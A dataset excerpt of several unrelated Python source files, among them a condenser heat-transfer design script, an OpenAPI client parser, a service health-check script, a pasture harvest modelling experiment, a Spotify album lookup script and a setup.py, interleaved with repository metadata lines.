delta_T_prime, L_tube, Pcond def Dittus_Boelter(Di,k_water,U,rho,mu_water,Cp_water): ''' This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy''' Re = (Di*U*rho/mu_water) #Reynold's Number Pr = ((Cp_water*mu_water)/k_water) #Prandlt Number Nu = 0.023*((Re**0.8)*(Pr*0.4)) #Nusselt Number return (k_water*Nu)/Di def iterator(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant): ''' This function iterates until the temperature difference converge with 1% error ''' Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) tolerance = 0.01 max_iter = 1000 counter = 0 while counter < max_iter: if abs(Dt-delta_T) > tolerance: counter += 1 delta_T = Dt Dt, L_tube, Pcond = Designer(Tevap, Tcond, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) else: break return Pcond, L_tube, Dt P = [] #List for Pressure L = [] #List for Tube Lengths DT =[] #list for temperature difference for t in T: p, l, dt= iterator(Tevap, t, Twi, Twe, Do, Di, HRR, k_pipe, N, Pass, V_flow, delta_T, refrigerant) P.append(p) L.append(l) DT.append(dt) title = refrigerant+' Condenser Pressure vs Condenser Tube Length' #Plot title data = {'Condenser Temperature (C)':T, 'Condenser Pressure (kPa)':P, 'Condenser Tube Length (m)':L, 'Temperature Difference':DT} df = pd.DataFrame(data) # Exporting data to csv file filename = refrigerant + ' Tube Length Data.csv' #CSV file name df.to_csv(filename, index=False) # Plotting the data plt.plot(L,P) plt.xlabel('Condenser Tube Length (m)') plt.ylabel('Condenser Pressure (kPa)') plt.title(title) plt.show()
en
0.583195
# Constant Parameters #kW #Degree Celsius #Degree Celsius #Water inlet temp; Degree Celsius #Water outlet temp; Degree Celsius #Pipe outer diameter; m #Pipe inner diameter; m #Heat Rejection Ratio; Qcond/Qevap #Thermal conductivity of copper; J/mK #number of pipes #number of pass #refrigerant #Number of vertical flow # Iteration Variable #Assumed delta T #Array of Condenser Temperature #Flipped Condenser Array This function computes the actual temperature difference and the condenser tube length given condenser temperature as input Parameters: Tevap - Evaporator Temperature Tcond - Condenser Temperature Twi - Water inlet Temperature Twe - Water outlet Temperature Do - Pipe outer diameter Di - Pipe inner diameter HRR - Heat Rejection Ratio k_pipe - Pipe thermal conductivity N - Number of pipes Pass - Number of Bends + 1 V_flow - Number of fluid flow perpendicular to pipe delta_T - Temperature Difference refrigerant - Name of the Refrigerant Return: delta_T_prime - Converged Temperature Difference L_tube - Condenser Tube Length Pcond - Condenser Pressure # Refrigerant Side #Kelvin #@Tcond and Q=0; kPa #@Tcond and Q=0 #@Tcond and Q=0 #J/kg #@Tcond and Q=0 # Conduction in pipe # Fouling Factor # Convection in Water #Degree Celsius #Kelvin #Pascal #@Tbulkmean and P water #@Tbulkmean and P water #@Tbulkmean and P water #@Tbulkmean and P water #Heat Rejection #Total mass flow rate #mass flow per pipe #Flow rate/ Flow velocity #Enthalpy Water # Heat calculation #Thermal Resistance for Refrigerant; 1/(hA) #Thermal Resistance for Pipe; delta x/(kA) #Thermal Resistance for Fouling Factor; 1/(hA) #Thermal Resistance for Water; 1/(hA) #Totla Thermal Resistance #Log Mean Temperature Difference #Total condenser length #Length per tube #New delta T # print to debug print(f'h refrigerant: {h_refrigerant}') print(f'h pipe: {h_pipe}') print(f'h fouling: {h_fouling}') print(f'h water: {h_water}') print(f'mass flow: {m_water}') print(f'Delta T: {delta_T_prime}') print(f'Total Length: 
{L_total}') print(f'Length per tube: {L_tube}\n') This is the Dittus-Boelter Equation used to relate water enthalpy Nu = K*(Re**m)*(Pr**n) Parameters: Di - Pipe inner diameter k_water - Fluid thermal conductivity U - Fluid flow rate rho - Fluid Density mu_water - Fluid viscosity Cp_water - Constant pressure specific heat Return: h_water - Fluid enthalpy #Reynold's Number #Prandlt Number #Nusselt Number This function iterates until the temperature difference converge with 1% error #List for Pressure #List for Tube Lengths #list for temperature difference #Plot title # Exporting data to csv file #CSV file name # Plotting the data
3.236319
3
openapi_python_client/openapi_parser/openapi.py
acgray/openapi-python-client
0
6623587
from __future__ import annotations from dataclasses import dataclass, field from enum import Enum from typing import Any, Dict, Generator, Iterable, List, Optional, Set from .errors import ParseError from .properties import EnumProperty, ListProperty, Property, property_from_dict from .reference import Reference from .responses import ListRefResponse, RefResponse, Response, response_from_dict class ParameterLocation(str, Enum): """ The places Parameters can be put when calling an Endpoint """ QUERY = "query" PATH = "path" def import_string_from_reference(reference: Reference, prefix: str = "") -> str: """ Create a string which is used to import a reference """ return f"from {prefix}.{reference.module_name} import {reference.class_name}" @dataclass class EndpointCollection: """ A bunch of endpoints grouped under a tag that will become a module """ tag: str endpoints: List[Endpoint] = field(default_factory=list) relative_imports: Set[str] = field(default_factory=set) parse_errors: List[ParseError] = field(default_factory=list) @staticmethod def from_dict(d: Dict[str, Dict[str, Dict[str, Any]]]) -> Dict[str, EndpointCollection]: """ Parse the openapi paths data to get EndpointCollections by tag """ endpoints_by_tag: Dict[str, EndpointCollection] = {} for path, path_data in d.items(): for method, method_data in path_data.items(): tag = method_data.get("tags", ["default"])[0] collection = endpoints_by_tag.setdefault(tag, EndpointCollection(tag=tag)) try: endpoint = Endpoint.from_data(data=method_data, path=path, method=method, tag=tag) collection.endpoints.append(endpoint) collection.relative_imports.update(endpoint.relative_imports) except ParseError as e: e.header = f"ERROR parsing {method.upper()} {path} within {tag}. Endpoint will not be generated." 
collection.parse_errors.append(e) return endpoints_by_tag @dataclass class Endpoint: """ Describes a single endpoint on the server """ path: str method: str description: Optional[str] name: str requires_security: bool tag: str relative_imports: Set[str] = field(default_factory=set) query_parameters: List[Property] = field(default_factory=list) path_parameters: List[Property] = field(default_factory=list) responses: List[Response] = field(default_factory=list) form_body_reference: Optional[Reference] = None json_body: Optional[Property] = None multipart_body_reference: Optional[Reference] = None @staticmethod def parse_request_form_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] form_body = body_content.get("application/x-www-form-urlencoded") if form_body: return Reference.from_ref(form_body["schema"]["$ref"]) return None @staticmethod def parse_multipart_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] body = body_content.get("multipart/form-data") if body: return Reference.from_ref(body["schema"]["$ref"]) return None @staticmethod def parse_request_json_body(body: Dict[str, Any]) -> Optional[Property]: """ Return json_body """ body_content = body["content"] json_body = body_content.get("application/json") if json_body: return property_from_dict("json_body", required=True, data=json_body["schema"]) return None def _add_body(self, data: Dict[str, Any]) -> None: """ Adds form or JSON body to Endpoint if included in data """ if "requestBody" not in data: return self.form_body_reference = Endpoint.parse_request_form_body(data["requestBody"]) self.json_body = Endpoint.parse_request_json_body(data["requestBody"]) self.multipart_body_reference = Endpoint.parse_multipart_body(data["requestBody"]) if self.form_body_reference: self.relative_imports.add(import_string_from_reference(self.form_body_reference, prefix="..models")) if 
self.multipart_body_reference: self.relative_imports.add(import_string_from_reference(self.multipart_body_reference, prefix="..models")) if self.json_body is not None: self.relative_imports.update(self.json_body.get_imports(prefix="..models")) def _add_responses(self, data: Dict[str, Any]) -> None: for code, response_dict in data["responses"].items(): response = response_from_dict(status_code=int(code), data=response_dict) if isinstance(response, (RefResponse, ListRefResponse)): self.relative_imports.add(import_string_from_reference(response.reference, prefix="..models")) self.responses.append(response) def _add_parameters(self, data: Dict[str, Any]) -> None: for param_dict in data.get("parameters", []): prop = property_from_dict( name=param_dict["name"], required=param_dict["required"], data=param_dict["schema"] ) self.relative_imports.update(prop.get_imports(prefix="..models")) if param_dict["in"] == ParameterLocation.QUERY: self.query_parameters.append(prop) elif param_dict["in"] == ParameterLocation.PATH: self.path_parameters.append(prop) else: raise ValueError(f"Don't know where to put this parameter: {param_dict}") @staticmethod def from_data(*, data: Dict[str, Any], path: str, method: str, tag: str) -> Endpoint: """ Construct an endpoint from the OpenAPI data """ endpoint = Endpoint( path=path, method=method, description=data.get("description"), name=data["operationId"], requires_security=bool(data.get("security")), tag=tag, ) endpoint._add_parameters(data) endpoint._add_responses(data) endpoint._add_body(data) return endpoint @dataclass class Schema: """ Describes a schema, AKA data model used in requests. 
These will all be converted to dataclasses in the client """ reference: Reference required_properties: List[Property] optional_properties: List[Property] description: str relative_imports: Set[str] @staticmethod def from_dict(d: Dict[str, Any], name: str) -> Schema: """ A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. """ required_set = set(d.get("required", [])) required_properties: List[Property] = [] optional_properties: List[Property] = [] relative_imports: Set[str] = set() ref = Reference.from_ref(d.get("title", name)) for key, value in d.get("properties", {}).items(): required = key in required_set p = property_from_dict(name=key, required=required, data=value) if required: required_properties.append(p) else: optional_properties.append(p) relative_imports.update(p.get_imports(prefix="")) schema = Schema( reference=ref, required_properties=required_properties, optional_properties=optional_properties, relative_imports=relative_imports, description=d.get("description", ""), ) return schema @staticmethod def dict(d: Dict[str, Dict[str, Any]]) -> Dict[str, Schema]: """ Get a list of Schemas from an OpenAPI dict """ result = {} for name, data in d.items(): s = Schema.from_dict(data, name=name) result[s.reference.class_name] = s return result @dataclass class OpenAPI: """ Top level OpenAPI document """ title: str description: Optional[str] version: str schemas: Dict[str, Schema] endpoint_collections_by_tag: Dict[str, EndpointCollection] enums: Dict[str, EnumProperty] @staticmethod def from_dict(d: Dict[str, Dict[str, Any]]) -> OpenAPI: """ Create an OpenAPI from dict """ schemas = Schema.dict(d["components"]["schemas"]) endpoint_collections_by_tag = EndpointCollection.from_dict(d["paths"]) enums = EnumProperty.get_all_enums() return OpenAPI( title=d["info"]["title"], 
description=d["info"].get("description"), version=d["info"]["version"], endpoint_collections_by_tag=endpoint_collections_by_tag, schemas=schemas, enums=enums, )
from __future__ import annotations from dataclasses import dataclass, field from enum import Enum from typing import Any, Dict, Generator, Iterable, List, Optional, Set from .errors import ParseError from .properties import EnumProperty, ListProperty, Property, property_from_dict from .reference import Reference from .responses import ListRefResponse, RefResponse, Response, response_from_dict class ParameterLocation(str, Enum): """ The places Parameters can be put when calling an Endpoint """ QUERY = "query" PATH = "path" def import_string_from_reference(reference: Reference, prefix: str = "") -> str: """ Create a string which is used to import a reference """ return f"from {prefix}.{reference.module_name} import {reference.class_name}" @dataclass class EndpointCollection: """ A bunch of endpoints grouped under a tag that will become a module """ tag: str endpoints: List[Endpoint] = field(default_factory=list) relative_imports: Set[str] = field(default_factory=set) parse_errors: List[ParseError] = field(default_factory=list) @staticmethod def from_dict(d: Dict[str, Dict[str, Dict[str, Any]]]) -> Dict[str, EndpointCollection]: """ Parse the openapi paths data to get EndpointCollections by tag """ endpoints_by_tag: Dict[str, EndpointCollection] = {} for path, path_data in d.items(): for method, method_data in path_data.items(): tag = method_data.get("tags", ["default"])[0] collection = endpoints_by_tag.setdefault(tag, EndpointCollection(tag=tag)) try: endpoint = Endpoint.from_data(data=method_data, path=path, method=method, tag=tag) collection.endpoints.append(endpoint) collection.relative_imports.update(endpoint.relative_imports) except ParseError as e: e.header = f"ERROR parsing {method.upper()} {path} within {tag}. Endpoint will not be generated." 
collection.parse_errors.append(e) return endpoints_by_tag @dataclass class Endpoint: """ Describes a single endpoint on the server """ path: str method: str description: Optional[str] name: str requires_security: bool tag: str relative_imports: Set[str] = field(default_factory=set) query_parameters: List[Property] = field(default_factory=list) path_parameters: List[Property] = field(default_factory=list) responses: List[Response] = field(default_factory=list) form_body_reference: Optional[Reference] = None json_body: Optional[Property] = None multipart_body_reference: Optional[Reference] = None @staticmethod def parse_request_form_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] form_body = body_content.get("application/x-www-form-urlencoded") if form_body: return Reference.from_ref(form_body["schema"]["$ref"]) return None @staticmethod def parse_multipart_body(body: Dict[str, Any]) -> Optional[Reference]: """ Return form_body_reference """ body_content = body["content"] body = body_content.get("multipart/form-data") if body: return Reference.from_ref(body["schema"]["$ref"]) return None @staticmethod def parse_request_json_body(body: Dict[str, Any]) -> Optional[Property]: """ Return json_body """ body_content = body["content"] json_body = body_content.get("application/json") if json_body: return property_from_dict("json_body", required=True, data=json_body["schema"]) return None def _add_body(self, data: Dict[str, Any]) -> None: """ Adds form or JSON body to Endpoint if included in data """ if "requestBody" not in data: return self.form_body_reference = Endpoint.parse_request_form_body(data["requestBody"]) self.json_body = Endpoint.parse_request_json_body(data["requestBody"]) self.multipart_body_reference = Endpoint.parse_multipart_body(data["requestBody"]) if self.form_body_reference: self.relative_imports.add(import_string_from_reference(self.form_body_reference, prefix="..models")) if 
self.multipart_body_reference: self.relative_imports.add(import_string_from_reference(self.multipart_body_reference, prefix="..models")) if self.json_body is not None: self.relative_imports.update(self.json_body.get_imports(prefix="..models")) def _add_responses(self, data: Dict[str, Any]) -> None: for code, response_dict in data["responses"].items(): response = response_from_dict(status_code=int(code), data=response_dict) if isinstance(response, (RefResponse, ListRefResponse)): self.relative_imports.add(import_string_from_reference(response.reference, prefix="..models")) self.responses.append(response) def _add_parameters(self, data: Dict[str, Any]) -> None: for param_dict in data.get("parameters", []): prop = property_from_dict( name=param_dict["name"], required=param_dict["required"], data=param_dict["schema"] ) self.relative_imports.update(prop.get_imports(prefix="..models")) if param_dict["in"] == ParameterLocation.QUERY: self.query_parameters.append(prop) elif param_dict["in"] == ParameterLocation.PATH: self.path_parameters.append(prop) else: raise ValueError(f"Don't know where to put this parameter: {param_dict}") @staticmethod def from_data(*, data: Dict[str, Any], path: str, method: str, tag: str) -> Endpoint: """ Construct an endpoint from the OpenAPI data """ endpoint = Endpoint( path=path, method=method, description=data.get("description"), name=data["operationId"], requires_security=bool(data.get("security")), tag=tag, ) endpoint._add_parameters(data) endpoint._add_responses(data) endpoint._add_body(data) return endpoint @dataclass class Schema: """ Describes a schema, AKA data model used in requests. 
These will all be converted to dataclasses in the client """ reference: Reference required_properties: List[Property] optional_properties: List[Property] description: str relative_imports: Set[str] @staticmethod def from_dict(d: Dict[str, Any], name: str) -> Schema: """ A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. """ required_set = set(d.get("required", [])) required_properties: List[Property] = [] optional_properties: List[Property] = [] relative_imports: Set[str] = set() ref = Reference.from_ref(d.get("title", name)) for key, value in d.get("properties", {}).items(): required = key in required_set p = property_from_dict(name=key, required=required, data=value) if required: required_properties.append(p) else: optional_properties.append(p) relative_imports.update(p.get_imports(prefix="")) schema = Schema( reference=ref, required_properties=required_properties, optional_properties=optional_properties, relative_imports=relative_imports, description=d.get("description", ""), ) return schema @staticmethod def dict(d: Dict[str, Dict[str, Any]]) -> Dict[str, Schema]: """ Get a list of Schemas from an OpenAPI dict """ result = {} for name, data in d.items(): s = Schema.from_dict(data, name=name) result[s.reference.class_name] = s return result @dataclass class OpenAPI: """ Top level OpenAPI document """ title: str description: Optional[str] version: str schemas: Dict[str, Schema] endpoint_collections_by_tag: Dict[str, EndpointCollection] enums: Dict[str, EnumProperty] @staticmethod def from_dict(d: Dict[str, Dict[str, Any]]) -> OpenAPI: """ Create an OpenAPI from dict """ schemas = Schema.dict(d["components"]["schemas"]) endpoint_collections_by_tag = EndpointCollection.from_dict(d["paths"]) enums = EnumProperty.get_all_enums() return OpenAPI( title=d["info"]["title"], 
description=d["info"].get("description"), version=d["info"]["version"], endpoint_collections_by_tag=endpoint_collections_by_tag, schemas=schemas, enums=enums, )
en
0.795454
The places Parameters can be put when calling an Endpoint Create a string which is used to import a reference A bunch of endpoints grouped under a tag that will become a module Parse the openapi paths data to get EndpointCollections by tag Describes a single endpoint on the server Return form_body_reference Return form_body_reference Return json_body Adds form or JSON body to Endpoint if included in data Construct an endpoint from the OpenAPI data Describes a schema, AKA data model used in requests. These will all be converted to dataclasses in the client A single Schema from its dict representation :param d: Dict representation of the schema :param name: Name by which the schema is referenced, such as a model name. Used to infer the type name if a `title` property is not available. Get a list of Schemas from an OpenAPI dict Top level OpenAPI document Create an OpenAPI from dict
2.527715
3
distributed/scripts/instances_validator.py
jina-ai/stress-test
4
6623588
<gh_stars>1-10 import sys import time import requests import yaml try: with open('_instances.yaml') as f: e2e_ip_dict = yaml.safe_load(f) except FileNotFoundError: raise Exception('Please make sure the previous step has created the instances.yaml file') total_time_to_wait = 120 init_time = time.time() check_until = init_time + total_time_to_wait e2e_ip_validate = {} for instance_name in e2e_ip_dict.copy().keys(): if 'client' in instance_name.lower(): e2e_ip_dict.pop(instance_name) while time.time() < check_until and sum(e2e_ip_validate.values()) != len(e2e_ip_dict): print(f'Sleeping for 2 secs') time.sleep(2) for instance_name, ip in e2e_ip_dict.items(): try: e2e_ip_validate[ip] = True \ if requests.get(f'http://{ip}:8000', timeout=5).status_code == requests.codes.ok \ else False except requests.ConnectionError: print(f'Timeout for {instance_name}:{ip}') e2e_ip_validate[ip] = False print(f'Current status: {e2e_ip_validate}, sleeping for a second!') time.sleep(1) if time.time() > check_until: print(f'Tried to connect to all jinad instances for {total_time_to_wait} secs, timing out now.') sys.exit(1) else: print(f'Hurray! Successfully connected to all JinaD instances. Took ~{time.time() - init_time:.0f} secs')
import sys import time import requests import yaml try: with open('_instances.yaml') as f: e2e_ip_dict = yaml.safe_load(f) except FileNotFoundError: raise Exception('Please make sure the previous step has created the instances.yaml file') total_time_to_wait = 120 init_time = time.time() check_until = init_time + total_time_to_wait e2e_ip_validate = {} for instance_name in e2e_ip_dict.copy().keys(): if 'client' in instance_name.lower(): e2e_ip_dict.pop(instance_name) while time.time() < check_until and sum(e2e_ip_validate.values()) != len(e2e_ip_dict): print(f'Sleeping for 2 secs') time.sleep(2) for instance_name, ip in e2e_ip_dict.items(): try: e2e_ip_validate[ip] = True \ if requests.get(f'http://{ip}:8000', timeout=5).status_code == requests.codes.ok \ else False except requests.ConnectionError: print(f'Timeout for {instance_name}:{ip}') e2e_ip_validate[ip] = False print(f'Current status: {e2e_ip_validate}, sleeping for a second!') time.sleep(1) if time.time() > check_until: print(f'Tried to connect to all jinad instances for {total_time_to_wait} secs, timing out now.') sys.exit(1) else: print(f'Hurray! Successfully connected to all JinaD instances. Took ~{time.time() - init_time:.0f} secs')
none
1
2.582436
3
Pasture_Growth_Modelling/initialisation_support/explore_harvest_parameters.py
Komanawa-Solutions-Ltd/SLMACC-2020-CSRA
0
6623589
""" Author: <NAME> Created: 23/11/2020 11:02 AM """ import ksl_env import pandas as pd import numpy as np import os # add basgra nz functions ksl_env.add_basgra_nz_path() from check_basgra_python.support_for_tests import get_lincoln_broadfield, get_woodward_weather, _clean_harvest from basgra_python import run_basgra_nz from check_basgra_python.support_for_tests import establish_org_input from supporting_functions.plotting import plot_multiple_results def run_old_basgra(): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') days_harvest = _clean_harvest(days_harvest, matrix_weather) out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out def run_frequent_harvest(freq, trig, targ): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') strs = ['{}-{:03d}'.format(e, f) for e, f in matrix_weather[['year', 'doy']].itertuples(False, None)] days_harvest = pd.DataFrame({'year': matrix_weather.loc[:, 'year'], 'doy': matrix_weather.loc[:, 'doy'], 'frac_harv': np.ones(len(matrix_weather)), # set filler values 'harv_trig': np.zeros(len(matrix_weather)) - 1, # set flag to not harvest 'harv_targ': np.zeros(len(matrix_weather)), # set filler values 'weed_dm_frac': np.zeros(len(matrix_weather)), # set filler values }) # start harvesting at the same point harv_days = pd.date_range(start='2011-09-03', end='2017-04-30', freq='{}D'.format(freq)) idx = np.in1d(pd.to_datetime(strs, format='%Y-%j'), harv_days) days_harvest.loc[idx, 'harv_trig'] = trig days_harvest.loc[idx, 'harv_targ'] = targ out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out if __name__ == '__main__': outdir = ksl_env.shared_drives(r"Z2003_SLMACC\pasture_growth_modelling\basgra_harvest_tuning\irr_harv_testing") data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1501, 1600, 1700] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, 
Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trig_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 20, 30] trigs = [1501, 1501, 1501] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'],outdir=os.path.join(outdir, 'freq_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1301, 1501, 1801] targs = [1300, 1500, 1800] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trag_vary'))
""" Author: <NAME> Created: 23/11/2020 11:02 AM """ import ksl_env import pandas as pd import numpy as np import os # add basgra nz functions ksl_env.add_basgra_nz_path() from check_basgra_python.support_for_tests import get_lincoln_broadfield, get_woodward_weather, _clean_harvest from basgra_python import run_basgra_nz from check_basgra_python.support_for_tests import establish_org_input from supporting_functions.plotting import plot_multiple_results def run_old_basgra(): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') days_harvest = _clean_harvest(days_harvest, matrix_weather) out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out def run_frequent_harvest(freq, trig, targ): params, matrix_weather, days_harvest, doy_irr = establish_org_input('lincoln') strs = ['{}-{:03d}'.format(e, f) for e, f in matrix_weather[['year', 'doy']].itertuples(False, None)] days_harvest = pd.DataFrame({'year': matrix_weather.loc[:, 'year'], 'doy': matrix_weather.loc[:, 'doy'], 'frac_harv': np.ones(len(matrix_weather)), # set filler values 'harv_trig': np.zeros(len(matrix_weather)) - 1, # set flag to not harvest 'harv_targ': np.zeros(len(matrix_weather)), # set filler values 'weed_dm_frac': np.zeros(len(matrix_weather)), # set filler values }) # start harvesting at the same point harv_days = pd.date_range(start='2011-09-03', end='2017-04-30', freq='{}D'.format(freq)) idx = np.in1d(pd.to_datetime(strs, format='%Y-%j'), harv_days) days_harvest.loc[idx, 'harv_trig'] = trig days_harvest.loc[idx, 'harv_targ'] = targ out = run_basgra_nz(params, matrix_weather, days_harvest, doy_irr, verbose=False) return out if __name__ == '__main__': outdir = ksl_env.shared_drives(r"Z2003_SLMACC\pasture_growth_modelling\basgra_harvest_tuning\irr_harv_testing") data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1501, 1600, 1700] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, 
Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trig_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 20, 30] trigs = [1501, 1501, 1501] targs = [1500, 1500, 1500] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'],outdir=os.path.join(outdir, 'freq_vary')) data = { 'Woodward_model': run_old_basgra(), } freq = [10, 10, 10] trigs = [1301, 1501, 1801] targs = [1300, 1500, 1800] for f, tr, ta, in zip(freq, trigs, targs): data['freq: {}, Trig:{}, Targ:{}'.format(f, tr, ta)] = run_frequent_harvest(f, tr, ta) plot_multiple_results(data, out_vars=['DM', 'YIELD', 'BASAL', 'DMH_RYE', 'DM_RYE_RM'], outdir=os.path.join(outdir, 'trag_vary'))
en
0.407268
Author: <NAME> Created: 23/11/2020 11:02 AM # add basgra nz functions # set filler values # set flag to not harvest # set filler values # set filler values # start harvesting at the same point
2.224565
2
get_spotify_info.py
tanelso2/favorite-albums-webapp
0
6623590
<reponame>tanelso2/favorite-albums-webapp # coding: utf-8 import base64 import configparser import json import requests import sys import urllib.parse def get_client_values(file_loc=None): if file_loc is None: file_loc = sys.argv[1] config = configparser.ConfigParser() config.read(file_loc) return config["Spotify"]["client_id"], config["Spotify"]["client_secret"] def get_auth_token(): client_id, client_secret = get_client_values() auth_field = f"{client_id}:{client_secret}" auth_field = auth_field.encode('utf-8') encoded_auth_header = base64.b64encode(auth_field) headers = {"Authorization": "Basic {}".format(encoded_auth_header.decode('utf-8'))} body = {"grant_type": "client_credentials"} spotify_auth_url = "https://accounts.spotify.com/api/token" r = requests.post(spotify_auth_url, headers=headers, data=body) return r.json()['access_token'] def need_exact_match(album, artist): overrides = [ # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh ['Love, Pt. 1', 'Angels & Airwaves'] ] for o_album, o_artist in overrides: if album == o_album and artist == o_artist: return True return False def get_album_information(album, artist, auth_token=None): if auth_token is None: auth_token = get_auth_token() search_url = "https://api.spotify.com/v1/search" query = f"album:{album} artist:{artist}" encoded_query_str = urllib.parse.urlencode({"q": query, "type": "album", "limit": 50}) headers = {"Authorization": f"Bearer {auth_token}"} r = requests.get(f"{search_url}?{encoded_query_str}", headers=headers) if need_exact_match(album, artist): for info in r.json()['albums']['items']: i_artist = info["artists"][0]["name"] i_album = info["name"] if i_artist == artist and i_album == album: return info # For debugging errors: # print(f'{album} by {artist}') return r.json()['albums']['items'][0] def parse_spotify_album_info(album_info): album_name = album_info["name"] album_url = album_info["external_urls"]["spotify"] artist = album_info["artists"][0] artist_url = 
artist["external_urls"]["spotify"] artist_name = artist["name"] images = album_info["images"] #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices return {"album-name": album_name, "album-url": album_url, "artist-name": artist_name, "artist-url": artist_url, "images": images} def get_album_list(): with open('favorites.txt', 'r') as f: data = f.read().strip() albums = data.split('\n') def parse_album_info(line): parts = line.split(' by ') album, artist = parts return {"album": album, "artist": artist} return [parse_album_info(x) for x in albums] album_list = get_album_list() auth_token = get_auth_token() album_infos = [get_album_information(x["album"], x["artist"], auth_token=auth_token) for x in album_list] output = [parse_spotify_album_info(x) for x in album_infos] print(json.dumps(output))
# coding: utf-8 import base64 import configparser import json import requests import sys import urllib.parse def get_client_values(file_loc=None): if file_loc is None: file_loc = sys.argv[1] config = configparser.ConfigParser() config.read(file_loc) return config["Spotify"]["client_id"], config["Spotify"]["client_secret"] def get_auth_token(): client_id, client_secret = get_client_values() auth_field = f"{client_id}:{client_secret}" auth_field = auth_field.encode('utf-8') encoded_auth_header = base64.b64encode(auth_field) headers = {"Authorization": "Basic {}".format(encoded_auth_header.decode('utf-8'))} body = {"grant_type": "client_credentials"} spotify_auth_url = "https://accounts.spotify.com/api/token" r = requests.post(spotify_auth_url, headers=headers, data=body) return r.json()['access_token'] def need_exact_match(album, artist): overrides = [ # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh ['Love, Pt. 1', 'Angels & Airwaves'] ] for o_album, o_artist in overrides: if album == o_album and artist == o_artist: return True return False def get_album_information(album, artist, auth_token=None): if auth_token is None: auth_token = get_auth_token() search_url = "https://api.spotify.com/v1/search" query = f"album:{album} artist:{artist}" encoded_query_str = urllib.parse.urlencode({"q": query, "type": "album", "limit": 50}) headers = {"Authorization": f"Bearer {auth_token}"} r = requests.get(f"{search_url}?{encoded_query_str}", headers=headers) if need_exact_match(album, artist): for info in r.json()['albums']['items']: i_artist = info["artists"][0]["name"] i_album = info["name"] if i_artist == artist and i_album == album: return info # For debugging errors: # print(f'{album} by {artist}') return r.json()['albums']['items'][0] def parse_spotify_album_info(album_info): album_name = album_info["name"] album_url = album_info["external_urls"]["spotify"] artist = album_info["artists"][0] artist_url = artist["external_urls"]["spotify"] 
artist_name = artist["name"] images = album_info["images"] #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices return {"album-name": album_name, "album-url": album_url, "artist-name": artist_name, "artist-url": artist_url, "images": images} def get_album_list(): with open('favorites.txt', 'r') as f: data = f.read().strip() albums = data.split('\n') def parse_album_info(line): parts = line.split(' by ') album, artist = parts return {"album": album, "artist": artist} return [parse_album_info(x) for x in albums] album_list = get_album_list() auth_token = get_auth_token() album_infos = [get_album_information(x["album"], x["artist"], auth_token=auth_token) for x in album_list] output = [parse_spotify_album_info(x) for x in album_infos] print(json.dumps(output))
en
0.833905
# coding: utf-8 # Needed to get past the Love Pts 1 & 2 double album. # Part 2 is merely meh # For debugging errors: # print(f'{album} by {artist}') #Preserve all the images. # Just in case I want to add logic to switch # to smaller images on smaller devices
3.006002
3
setup.py
allanlwu/allangdrive
0
6623591
import setuptools setuptools.setup( name="allangdrive", version='0.1.0', url="https://github.com/allanlwu/allangdrive", author="<NAME>", description="Jupyter extension to allow user to sync files to Google Drive", packages=setuptools.find_packages(), install_requires=[ 'notebook', ], package_data={'allangdrive': ['static/*']}, )
